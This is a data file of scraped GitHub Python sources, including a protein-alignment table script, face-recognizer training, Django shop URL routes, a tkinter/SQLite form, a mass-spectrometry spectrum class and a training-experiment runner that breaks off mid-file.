+{"seq_id": "16943979908", "text": "\nimport sys\nimport os\nimport csv\nimport pandas as pd\nimport argparse\n\n'''\nThis scripts creates a csv table from the master alignment fasta file.\n\nRecommended usage:\n\ncat data/sh2_master_edited.fasta | python table_from_master_alignment_with_numbers_intendation_20210316.py ../data/SH2_domain_containing_prot_right_resnum_fixed.csv > table_alignment.csv\n'''\n\n\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawTextHelpFormatter\n )\nparser.add_argument(\n type=str, \n dest='inputfile2'\n )\nargs = parser.parse_args()\n\ninputfile2 = args.inputfile2\n\n# with open(sys.stdin, \"r\") as fasta:\n# line = fasta.readline()\n#print(line, \"\\n\", \"Succesful fasta file read.\")\n\n#table = pd.read_csv('/home/takacsg/Documents/SH2DB/SH2_domain_containing_prot_new_uniprot_start_stop_filled.csv')\n#print(table.head())\n\n#with open('/home/takacsg/Documents/SH2DB/SH2_domain_containing_prot_new_uniprot_start_stop_filled.csv') as table:\nwith open(inputfile2) as table:\n numbers = {}\n for line in table:\n line = line.split(',')\n #print(\"this is the line\", line)\n ID = line[6]\n start = line[11]\n stop = line[12]\n numbers[ID] = [start, stop]\n \n \nn = 0\nlista = []\n# with open(sys.stdin, \"r\") as fasta:\nfor x in sys.stdin:\n x = x.rstrip()\n n += 1\n if n % 2 != 0:\n current_ID = x.rstrip() # x = eg.: STAT6 \n current_ID = current_ID[1:] #.split('>')[1]\n current_ID = current_ID.split('|')[0]\n #print(current_ID)\n else:\n #lista = len(x) # x is the original sequence (with gaps)\n print(current_ID + ',' + ','.join(x)) # this will give the comma separated sequence with gaps\n lista2 = [] # that will give the residue numbers\n non_gap = False # It should remain False until y = \"-\" (gap)\n counter = 0\n lista2.append(\" \") # Added because ID-s are the first cells of rows\n try: \n counter_target = int(numbers[current_ID][1]) - int(numbers[current_ID][0])\n for y in x:\n if non_gap:\n if counter == counter_target:\n lista2.append(numbers[current_ID][1].rstrip())\n break\n if y != \"-\":\n num = str(int(numbers[current_ID][0]) + counter)\n lista2.append(num)\n counter += 1\n #continue\n else:\n lista2.append(\" \")\n elif y != '-':\n non_gap = True\n counter += 1\n try:\n lista2.append(numbers[current_ID][0])\n except: continue\n elif y == '-':\n lista2.append(\" \")\n continue\n print(','.join(lista2))\n except KeyError: \n #counter_target = 10000\n print(\" No structure found \")\n \n", "repo_name": "keserulab/SH2db", "sub_path": "shared/sh2db/Scripts/table_process_B1__table_from_master_alignment.py", "file_name": "table_process_B1__table_from_master_alignment.py", "file_ext": "py", "file_size_in_byte": 2965, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 17, "usage_type": "call"}, {"api_name": "argparse.RawTextHelpFormatter", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 50, "usage_type": "attribute"}]}
+{"seq_id": "12711493553", "text": "import os\nimport numpy as np \nfrom PIL import Image\nimport cv2\n\n\nrecog = cv2.face.LBPHFaceRecognizer_create()\npath = 'dataset'\n\ndef getImageswithID(path):\n\timagePaths = [os.path.join(path,f) for f in os.listdir(path)]\n\tfaces = []\n\tNames = []\n\n\tfor imgpath in imagePaths:\n\t\tfaceImg = Image.open(imgpath)\n\t\tfaceNp = np.array(faceImg,'uint8')\n\t\tName = (os.path.split(imgpath)[-1].split('_')[0])\n\t\t\n\t\tfaces.append(faceNp)\n\t\tNames.append(Name)\n\t\tcv2.imshow('training',faceNp)\n\t\tcv2.waitKey(10)\n\treturn Names, faces\n\nNames ,faces = getImageswithID(path)\nNames=[0]*len(faces)\nrecog.train(faces,np.array(Names))\nrecog.write('trainingData1.yml')\ncv2.destroyAllWindows()\n\n", "repo_name": "InternityFoundation/Perceptron_3038", "sub_path": "Sprint Cycles/Navjot Singh/Face detection/face_recog_train.py", "file_name": "face_recog_train.py", "file_ext": "py", "file_size_in_byte": 662, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "32", "api": [{"api_name": "cv2.face.LBPHFaceRecognizer_create", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.face", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "32912879767", "text": "from django.conf.urls import url\r\nfrom . import views\r\nfrom .import Code\r\nurlpatterns = [\r\n #卖家选择\r\n url(r'^manage_shop_home/', views.manage_shop_home, name='manage_shop_home'),\r\n #登录路由\r\n url(r'^manage_login/',views.manage_login,name='manage_login'),\r\n url(r'^manage_login_han/',views.manage_login_han,name='manage_login_han'),\r\n url(r'^manage_home/(?P[0-9]+)?',views.manage_home,name='manage_home'),\r\n url(r'^manage_login_out/',views.manage_login_out,name='manage_login_out'),\r\n url(r'^manage_Code',Code.tu),\r\n #商品路由\r\n url(r'^manage_add/',views.manage_add,name='manage_add'),\r\n url(r'^manage_add_han/',views.manage_add_han,name='manage_add_han'),\r\n url(r'^manage_add_list/', views.manage_add_list, name='manage_add_list'),\r\n url(r'^manage_add_list_del/(?P[0-9]+)?', views.manage_add_list_del, name='manage_add_list_del'),\r\n url(r'^manage_add_list_modify/(?P[0-9]+)?', views.manage_add_list_modify, name='manage_add_list_modify'),\r\n url(r'^manage_add_modify_han/', views.manage_modify_han, name='manage_modify_han'),\r\n #商品上架/下架\r\n url(r'^manage_add_up/(?P[0-9]+)?',views.manage_add_up, name='manage_add_up'),\r\n url(r'^manage_add_dowm/(?P[0-9]+)?',views.manage_add_dowm, name='manage_add_dowm'),\r\n #类别路由\r\n url(r'^manage_leibie/',views.manage_leibie,name='manage_leibie'),\r\n url(r'^manage_leibie_han/',views.manage_leibie_han,name='manage_leibie_han'),\r\n url(r'^manage_leibie_del/(?P[0-9]+)?',views.manage_leibie_del,name='manage_leibie_del'),\r\n url(r'^leibie_modify/(?P[0-9]+)?',views.leibie_modify,name='leibie_modify'),\r\n url(r'^leibie_modify_han/',views.leibie_modify_han,name='leibie_modify_han'),\r\n url(r'^manage_leibie_list/', views.manage_leibie_list, name='manage_leibie_list'),\r\n #商家订单管理\r\n url(r'^manage_order_list/', views.manage_order_list, name='manage_order_list'),\r\n url(r'^manage_order_page/(?P[0-9]+)?', views.manage_order_page, name='manage_order_page'),\r\n url(r'^manage_order_comment/(?P[0-9]+)?', views.manage_order_comment, name='manage_order_comment'),\r\n #发货操作\r\n url(r'^manage_logistics/(?P[0-9]+)?', views.manage_logistics, name='manage_logistics'),\r\n url(r'^manage_logistics_han/', views.manage_logistics_han, name='manage_logistics_han'),\r\n #会员管理\r\n url(r'^manage_member_list/', views.manage_member_list, name='manage_member_list'),\r\n url(r'^manage_member_email/(?P[0-9]+)?', views.manage_member_email, name='manage_member_email'),\r\n url(r'^manage_show_email/(?P[0-9]+)?', views.manage_show_email, name='manage_show_email'),\r\n url(r'^manage_member_han/', views.manage_member_han, name='manage_member_han'),\r\n #权限管理\r\n url(r'^manage_power_list/', views.manage_power_list, name='manage_power_list'),\r\n url(r'^manage_power_add/', views.manage_power_add, name='manage_power_add'),\r\n url(r'^manage_power_han/', views.manage_power_han, name='manage_power_han'),\r\n url(r'^manage_power_modify/(?P[0-9]+)', views.manage_power_modify, name='manage_power_modify'),\r\n url(r'^manage_power_modify_han/', views.manage_power_modify_han, name='manage_power_modify_han'),\r\n url(r'^manage_power_del/', views.manage_power_del, name='manage_power_del'),\r\n #角色管理\r\n url(r'^manage_role_list/', views.manage_role_list, name='manage_role_list'),\r\n url(r'^manage_role_add/', views.manage_role_add, name='manage_role_add'),\r\n url(r'^manage_role_modify/', views.manage_role_modify, name='manage_role_modify'),\r\n url(r'^manage_role_del/', views.manage_role_del, name='manage_role_del'),\r\n]", "repo_name": "MyUncle1997/python_django_shop", "sub_path": "manageuser/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3665, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 28, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 35, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 38, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 40, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 41, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 43, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 44, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 45, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 46, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 47, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 48, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 50, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 51, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 52, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "2920329336", "text": "import os\nimport json\nimport time\nimport subprocess\nimport datetime\nimport signal\nimport argparse\nimport logging\nimport pandas as pd\n\ndef process(file_path, start, end):\n '''\n frame = pd.read_json(file_path, lines=True)\n files = list(frame['file_name'])\n timeout = 5\n '''\n i = start\n timeout = 5\n files = os.listdir(file_path)\n print(len(files))\n if end > len(files):\n end = len(files)\n while i < end:\n slicer = \"bash ./slicer.sh \" + file_path + \" \" + str(files[i]) + \" 1 \" + \"parsed/\" + str(files[i])\n start0 = datetime.datetime.now()\n process1 = subprocess.Popen(slicer, shell = True)\n while process1.poll() is None:\n time.sleep(0.2)\n end0 = datetime.datetime.now()\n if (end0-start0).seconds > timeout:\n os.kill(process1.pid, signal.SIGKILL)\n os.waitpid(-1, os.WNOHANG)\n i += 1\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--file_path', help='funtions dic.', default='../devign_dataset')\n parser.add_argument('--start', help='start functions number to parsed', type=int, default=0)\n parser.add_argument('--end', help='end functions number to parsed', type=int, default=4500)\n args = parser.parse_args()\n file_path = args.file_path\n start = args.start\n end = args.end\n process(file_path, start, end)\n\n", "repo_name": "AMPLE001/AMPLE", "sub_path": "data_processing/process.py", "file_name": "process.py", "file_ext": "py", "file_size_in_byte": 1411, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.listdir", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 25, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.kill", "line_number": 31, "usage_type": "call"}, {"api_name": "signal.SIGKILL", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.waitpid", "line_number": 32, "usage_type": "call"}, {"api_name": "os.WNOHANG", "line_number": 32, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "35324765860", "text": "import customtkinter\n\ncustomtkinter.set_appearance_mode(\"System\") # Modes: system (default), light, dark\ncustomtkinter.set_default_color_theme(\"blue\") # Themes: blue (default), dark-blue, green\n\napp = customtkinter.CTk() # create CTk window like you do with the Tk window\nscreen_width = app.winfo_screenwidth()\nscreen_height = app.winfo_screenheight()\n\n# Set window size to 1024x720 unless the screen is too small\nwindow_width = min(1024, screen_width)\nwindow_height = min(720, screen_height)\napp.geometry(f\"{window_width}x{window_height}\")\n\ndef button_function():\n app.destroy()\n\n# CTkButton example \nbutton = customtkinter.CTkButton(master=app, text=\"End!\", command=button_function)\nbutton.place(relx=0.5, rely=0.5, anchor=customtkinter.CENTER)\n\napp.mainloop()", "repo_name": "ProfessorRich/dnd-combat-simulator", "sub_path": "tkinter_interface.py", "file_name": "tkinter_interface.py", "file_ext": "py", "file_size_in_byte": 768, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "customtkinter.set_appearance_mode", "line_number": 3, "usage_type": "call"}, {"api_name": "customtkinter.set_default_color_theme", "line_number": 4, "usage_type": "call"}, {"api_name": "customtkinter.CTk", "line_number": 6, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 19, "usage_type": "call"}, {"api_name": "customtkinter.CENTER", "line_number": 20, "usage_type": "attribute"}]}
+{"seq_id": "26894287202", "text": "# www.plus2net.com\n# download updated script at https://www.plus2net.com/python/tkinter-sqlite-insert.php\nimport sqlite3\n\nmy_conn = sqlite3.connect('my_db.db')\n# print(\"Opened database successfully\");\n\nimport tkinter as tk\nfrom tkinter import *\n\nmy_w = tk.Tk()\nmy_w.geometry(\"400x250\")\nmy_w.title(\"www.plus2net.com\")\n# add one Label\nl0 = tk.Label(my_w, text='Add Student',\n font=('Helvetica', 16), width=30, anchor=\"c\")\nl0.grid(row=1, column=1, columnspan=4)\n\nl1 = tk.Label(my_w, text='Name: ', width=10, anchor=\"c\")\nl1.grid(row=3, column=1)\n\n# add one text box\nt1 = tk.Text(my_w, height=1, width=10, bg='white')\nt1.grid(row=3, column=2)\n\nl2 = tk.Label(my_w, text='Class: ', width=10)\nl2.grid(row=4, column=1)\n\n# add list box for selection of class\noptions = StringVar(my_w)\noptions.set(\"\") # default value\n\nopt1 = OptionMenu(my_w, options, \"Three\", \"Four\", \"Five\")\nopt1.grid(row=4, column=2)\n\nl3 = tk.Label(my_w, text='Mark: ', width=10)\nl3.grid(row=5, column=1)\n\n# add one text box\nt3 = tk.Text(my_w, height=1, width=4, bg='white')\nt3.grid(row=5, column=2)\n\nradio_v = tk.StringVar()\nradio_v.set('Female')\nr1 = tk.Radiobutton(my_w, text='Male', variable=radio_v, value='Male')\nr1.grid(row=6, column=2)\n\nr2 = tk.Radiobutton(my_w, text='Female', variable=radio_v, value='Female')\nr2.grid(row=6, column=3)\n\nb1 = tk.Button(my_w, text='Add Record', width=10,\n command=lambda: add_data())\nb1.grid(row=7, column=2)\nmy_str = tk.StringVar()\nl5 = tk.Label(my_w, textvariable=my_str, width=10)\nl5.grid(row=3, column=3)\nmy_str.set(\"Output\")\n\n\ndef add_data():\n flag_validation = True # set the flag\n my_name = t1.get(\"1.0\", END) # read name\n my_class = options.get() # read class\n my_mark = t3.get(\"1.0\", END) # read mark\n my_gender = radio_v.get() # read gender\n\n # length of my_name , my_class and my_gender more than 2\n if (len(my_name) < 2 or len(my_class) < 2 or len(my_gender) < 2):\n flag_validation = False\n try:\n val = int(my_mark) # checking mark as integer\n except:\n flag_validation = False\n\n if (flag_validation):\n my_str.set(\"Adding data...\")\n try:\n\n # print(\"Connected to database successfully\")\n\n my_data = (None, my_name, my_class, my_mark, my_gender)\n my_query = \"INSERT INTO student values(?,?,?,?,?)\"\n my_conn.execute(my_query, my_data)\n my_conn.commit()\n x = my_conn.execute('''select last_insert_rowid()''')\n id = x.fetchone()\n l5.grid()\n l5.config(fg='green') # foreground color\n l5.config(bg='white') # background color\n my_str.set(\"ID:\" + str(id[0]))\n l5.after(3000, lambda: l5.grid_remove())\n t1.delete('1.0', END) # reset the text entry box\n t3.delete('1.0', END) # reset the text entry box\n\n except sqlite3.Error as my_error:\n l5.grid()\n # return error\n l5.config(fg='red') # foreground color\n l5.config(bg='yellow') # background color\n print(my_error)\n my_str.set(my_error)\n\n else:\n l5.grid()\n l5.config(fg='red') # foreground color\n l5.config(bg='yellow') # background color\n my_str.set(\"check inputs.\")\n l5.after(3000, lambda: l5.grid_remove())\n\n\nmy_w.mainloop()\nmy_conn.close()", "repo_name": "Wachu75/pyfestival", "sub_path": "tydzien-5/tkinter_sql_01.py", "file_name": "tkinter_sql_01.py", "file_ext": "py", "file_size_in_byte": 3368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlite3.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 11, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 15, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 19, "usage_type": "call"}, {"api_name": "tkinter.Text", "line_number": 23, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 26, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 36, "usage_type": "call"}, {"api_name": "tkinter.Text", "line_number": 40, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 43, "usage_type": "call"}, {"api_name": "tkinter.Radiobutton", "line_number": 45, "usage_type": "call"}, {"api_name": "tkinter.Radiobutton", "line_number": 48, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 51, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 54, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 55, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 95, "usage_type": "attribute"}]}
+{"seq_id": "25173281523", "text": "import numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\nclass Spectrum:\n def __init__(\n self, mz: np.array = None, intensity: np.array = None, num_fragments: int = 10\n ):\n \"\"\"\n Creates a mass spectrometry spectrum, defined by its m/z bins and corresponding intensity values.\n Parameters\n ----------\n mz : np.array\n Array of mass:charge ratios.\n intensity : np.array\n Array of intensity values at corresponding indices of m/z.\n num_fragments : int\n Number of most intense fragments to extract.\n \"\"\"\n self.mz = mz\n self.intensity = intensity\n self.extracted_intensity = None\n self.extracted_mz = None\n self._extract_most_intense(num_fragments=num_fragments)\n return\n\n def _extract_most_intense(self, num_fragments: int = 10):\n \"\"\"\n Extracts the most intense m/z bins, and stores the intensity and m/z sorted values in self.extracted_mz and\n self.extracted_intensity\n Parameters\n ----------\n spectrum_intensity : np.array\n Array containing the spectrum intensities to extract.\n spectrum_mz : np.array\n Array containing the m/z values corresponding to the spectrum intensities. If None, the index corresponding to\n the intensities is returned. Default: None.\n num_fragments : int\n Number of fragments to extract. Default: 10.\n\n Returns\n -------\n tuple\n Tuple of np.arrays sorted in decreasing order: (mz, intensity) corresponding to the most intense peaks. I.e.,\n the most intense peak is first.\n \"\"\"\n if len(self.mz) == 0:\n self.mz = np.arange(len(self.intensity))\n\n # Sort fragments\n arg_idx = np.argsort(self.intensity)\n # Reverse list; take only top num_fragments\n # Check against np.inf\n if num_fragments == np.inf:\n # Take all fragments\n arg_idx = arg_idx[::-1]\n else:\n arg_idx = arg_idx[-1 : -(num_fragments + 1) : -1]\n self.extracted_mz = self.mz[arg_idx]\n self.extracted_intensity = self.intensity[arg_idx]\n return\n\n def get_matching_mz_indices(\n self, spectrum_to_match: \"Spectrum\", match_tolerance_ppm: int = 30\n ) -> tuple:\n \"\"\"\n Checks whether the extracted fragments from this spectrum matches those of another. Matches are defined as two\n spectra having high intensity values at the same m/z bin, within tolerance.\n Parameters\n ----------\n spectrum_to_match : Spectrum\n Other Spectrum object to compare.\n min_fragment : int\n Minimum number of fragments to consider a match\n match_tolerance_ppm : int\n The margin of error given to bins.\n\n Returns\n -------\n tuple\n Pair of lists corresponding to the indices that are matched across the spectra. (self_idx, spectrum_to_match_idx)\n \"\"\"\n\n # Spectra might be of different length; no clean way to compare them in bulk\n # First sort by mz, then crawl through each. Use argsort to restore original indices later\n self_arg_sorted = np.argsort(self.mz)\n sorted_self_mz = self.mz[self_arg_sorted]\n other_arg_sorted = np.argsort(spectrum_to_match.extracted_mz)\n sorted_other_mz = spectrum_to_match.extracted_mz[other_arg_sorted]\n\n self_start_idx = 0\n self_idx = []\n other_idx = []\n for other_mz_idx, other_mz in enumerate(sorted_other_mz):\n smallest_difference = np.inf\n for self_mz_idx, self_mz in zip(\n range(self_start_idx, len(sorted_self_mz)),\n sorted_self_mz[self_start_idx:],\n ):\n # Since they're sorted, we can skip the ones we've already checked\n # Check whether we're within tolerance\n # (ref_val - val) * (1e6) / ref_val\n if np.isclose(self_mz, other_mz, rtol=match_tolerance_ppm):\n # Mz values are sorted; once the difference increases we've found the minimum\n if abs(self_mz - other_mz) < smallest_difference:\n smallest_difference = abs(self_mz - other_mz)\n closest_self_idx = self_mz_idx\n closest_other_idx = other_mz_idx\n continue\n self_idx.append(closest_self_idx)\n other_idx.append(closest_other_idx)\n self_start_idx = (\n self_mz_idx - 1\n ) # Previous one might also be closest to the next bin\n break\n # Check whether other_mz is larger; indicates we should increment self_mz\n elif self_mz > other_mz:\n # Get next self_mz; ignore previously-checked mz from input spectra in next round\n self_start_idx = self_mz_idx\n break\n # Need to remap sorted idx to original idx:\n return self_arg_sorted[self_idx], other_arg_sorted[other_idx]\n\n def extracted_cosine_similarity(self, spectrum_to_compare: \"Spectrum\") -> float:\n \"\"\"\n Computes the cosine similarity between the extracted fragments of this spectrum and the input.\n\n Parameters\n ----------\n spectrum_to_compare : Spectrum\n Spectrum against which to compare\n Returns\n -------\n float\n Cosine similarity between this spectrum and the input.\n \"\"\"\n\n # Get fragment idx\n self_fragment_idx, other_fragment_idx = self.get_matching_mz_indices(\n spectrum_to_match=spectrum_to_compare, match_tolerance_ppm=30\n )\n # if len(self_fragment_idx) == 0:\n # return cosine_similarity(np.ones((1,1)), np.zeros((1,1)))\n return cosine_similarity(\n np.expand_dims(self.extracted_intensity[self_fragment_idx], axis=0),\n np.expand_dims(\n spectrum_to_compare.extracted_intensity[other_fragment_idx], axis=0\n ),\n )\n", "repo_name": "xomicsdatascience/zoDIAq", "sub_path": "src/zodiaq/plotting/spectrum.py", "file_name": "spectrum.py", "file_ext": "py", "file_size_in_byte": 6217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.isclose", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 146, "usage_type": "call"}]}
+{"seq_id": "71923649689", "text": "from typing import Any, Mapping, Optional, List, Tuple\nfrom absl import logging\n\nimport os\nimport gin\nimport functools\nimport tensorflow as tf\n\nfrom orbit.core import performance\nfrom orbit.config import ExperimentConfig\nfrom orbit.config import RuntimeConfig\nfrom orbit.config import OptimizationConfig\nfrom orbit.config import DifferentialPrivacyConfig\nfrom orbit.core.checkpoint import BestCheckpointExporter\nfrom orbit.launch import action\nfrom orbit.launch.task import Task\nfrom orbit.launch.controller import Controller, Action\nfrom orbit.launch.trainer import AbstractTrainer, AbstractValidator, Trainer\nfrom orbit.optimization import ExponentialMovingAverage\nfrom orbit.optimization.factory import OptimizerFactory\n\n\ndef _clip_l2_norm(grads_vars: List[Tuple[tf.Tensor, tf.Tensor]],\n l2_norm_clip: float) -> List[Tuple[tf.Tensor, tf.Tensor]]:\n gradients = []\n variables = []\n for g, v in grads_vars:\n gradients.append(g)\n variables.append(v)\n clipped_gradients = tf.clip_by_global_norm(gradients, l2_norm_clip)[0]\n return list(zip(clipped_gradients, variables))\n\n\ndef _add_noise(grads_vars: List[Tuple[tf.Tensor, tf.Tensor]],\n noise_stddev: float) -> List[Tuple[tf.Tensor, tf.Tensor]]:\n ret = []\n for g, v in grads_vars:\n noise = tf.random.normal(tf.shape(g), stddev=noise_stddev)\n ret.append(g + noise, v)\n return ret\n\n\nclass OrbitExperimentRunner:\n def __init__(self,\n distribution_strategy: tf.distribute.Strategy,\n task: Task,\n mode: str,\n params: ExperimentConfig,\n model_dir: str,\n run_post_validation: bool = False,\n save_summary: bool = True,\n train_actions: Optional[List[Action]] = None,\n validation_actions: Optional[List[Action]] = None,\n controller_cls=Controller) -> None:\n self._strategy = distribution_strategy or tf.distribute.get_strategy()\n self._params = params\n self._mode = mode\n self._model_dir = model_dir\n self._run_post_validation = run_post_validation\n\n with self._strategy.scope():\n self._trainer = self._build_trainer(\n params, task,\n train=('train' in mode),\n validation=('validation' in mode) or run_post_validation)\n assert self._trainer is not None\n\n self._checkpoint_manager = self._maybe_build_checkpoint_manager()\n\n self._controller = self._build_controller(\n trainer=self._trainer if 'train' in mode else None,\n validator=self._trainer,\n save_summary=save_summary,\n train_actions=train_actions,\n validation_actions=validation_actions,\n controller_cls=controller_cls)\n\n def _build_controller(self,\n trainer: AbstractTrainer,\n validator: AbstractValidator,\n save_summary: bool = True,\n train_actions: Optional[List[Action]] = None,\n validation_actions: Optional[List[Action]] = None,\n controller_cls=Controller):\n train_actions = [] if not train_actions else train_actions\n if trainer:\n train_actions += self._get_train_actions(\n self._params, trainer, self._model_dir,\n checkpoint_manager=self._checkpoint_manager)\n validation_actions = [] if not validation_actions else validation_actions\n if validator:\n validation_actions += self._get_validation_actions(\n self._params, trainer, self._model_dir)\n\n summary_dir = os.path.join(self._model_dir, 'train')\n validation_summary_dir = os.path.join(\n self._model_dir, self._params.trainer.validation_summary_subdir)\n summary_interval = self._params.trainer.summary_interval\n\n controller = controller_cls(\n strategy=self._strategy,\n trainer=trainer,\n validator=validator,\n global_step=self._trainer.global_step,\n steps_per_loop=self._params.trainer.steps_per_loop,\n checkpoint_manager=self._checkpoint_manager,\n summary_dir=summary_dir if save_summary else None,\n validation_summary_dir=validation_summary_dir if save_summary else None,\n summary_interval=summary_interval if save_summary else None,\n train_actions=train_actions,\n validation_actions=validation_actions)\n return controller\n\n def _build_trainer(self,\n params: ExperimentConfig,\n task: Task,\n train: bool,\n validation: bool):\n logging.info('Running default trainer.')\n\n # Build the model and optimizer\n model = task.build_model()\n optimizer = self._create_optimizer(task, params)\n\n return Trainer(\n self._strategy,\n params, task,\n model=model,\n optimizer=optimizer,\n train=train,\n validation=validation,\n checkpoint_exporter=self._build_best_checkpoint_exporter())\n\n def _create_optimizer(self, task, params):\n gradient_transformers = None\n if hasattr(params.task, 'differential_privacy_config'):\n dp_config = params.task.differential_privacy_config\n logging.info('Adding differential privacy transform with config %s.',\n dp_config.as_dict())\n noise_stddev = dp_config.clipping_norm * dp_config.noise_multiplier\n gradient_transformers = [\n functools.partial(\n _clip_l2_norm, l2_norm_clip=dp_config.clipping_norm),\n functools.partial(\n _add_noise, noise_stddev=noise_stddev, noise_seed=dp_config.noise_seed)\n ]\n\n opt_factory = OptimizerFactory(params.trainer.optimizer_config)\n optimizer = opt_factory.create_optimizer(\n opt_factory.learning_rate(),\n gradient_transformers=gradient_transformers,\n use_legacy_optimizer=params.trainer.use_legacy_optimizer)\n # Configuring optimizer when loss_scale is set in runtime config. This helps\n # avoiding overflow/underflow for float16 computations.\n if 